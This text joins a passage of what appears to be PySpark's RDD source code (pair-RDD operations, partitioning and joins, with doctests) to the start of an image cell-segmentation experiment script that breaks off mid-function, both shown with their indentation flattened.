>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
        The default partitioner is hash-partitioning.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as the default, because the builtin hash of None
# differs across machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
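For example, using the doctest SparkContext C{sc} set up by this module's tests:
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> sorted(rdd.aggregateByKey(0, add, add).collect())
[('a', 3), ('b', 1)]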
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in the JVM if there are different numbers
# of items in each partition.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}.
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
for partition in range(self.getNumPartitions()):
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have the same life cycle as the created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# There is a bug in py4j.java_gateway.JavaClass with auto_convert
# https://github.com/bartdag/py4j/issues/161
# TODO: use auto_convert once py4j fix the bug
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec, self.ctx.pythonVer,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
experiments.py
|
import os
from sklearn.model_selection import KFold
import numpy as np
from segmentation_functions import cell_segment, masks_to_npy
from gan_model import create_model, rotation, train_representation
import multiprocessing
from generate_figures import figure_8
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
def cell_segmentation(positive_images_root, negative_images_root, positive_npy_root,
negative_npy_root, ref_path, intensity, multi_core):
'''
Performs cell segmentation on input images
Parameters
----------
positive_images_root : str
path with positive images.
negative_images_root : str
path with negative images.
positive_npy_root : str
path with positive npy file.
negative_npy_root : str
path with negative npy file.
ref_path : str
path with reference image for stain normalization.
intensity : int
intensity for segmentation thresholding.
multi_core : bool, optional
if the process is multi core. The default is True.
Returns
-------
None.
'''
# get paths of positive and negative images
positive_images_path = [positive_images_root + n for n in
os.listdir(positive_images_root)]
negative_images_path = [negative_images_root + n for n in
os.listdir(negative_images_root)]
# create directories
if not os.path.exists(positive_npy_root + str(intensity) + '/'):
os.makedirs(positive_npy_root + str(intensity) + '/')
if not os.path.exists(negative_npy_root + str(intensity) + '/'):
os.makedirs(negative_npy_root + str(intensity) + '/')
# apply cell segmentation on images
if (multi_core == True and __name__ == '__main__'):
jobs = []
for index, i in enumerate(positive_images_path):
p = multiprocessing.Process(
target=cell_segment, args=(i, positive_npy_root + str(intensity) +
'/', ref_path, intensity))
p.start()
jobs.append(p)
if (index + 1) % 7 == 0:
p.join()
jobs = []
for job in jobs:
job.join()
jobs = []
for index, i in enumerate(negative_images_path):
p = multiprocessing.Process(
target=cell_segment, args=(i, negative_npy_root + str(intensity)
+ '/', ref_path, intensity))
p.start()
jobs.append(p)
if (index + 1) % 7 == 0:
p.join()
jobs = []
for job in jobs:
job.join()
else:
for index, i in enumerate(positive_images_path):
cell_segment(i, positive_npy_root + str(intensity)
+ '/', ref_path, intensity)
for index, i in enumerate(negative_images_path):
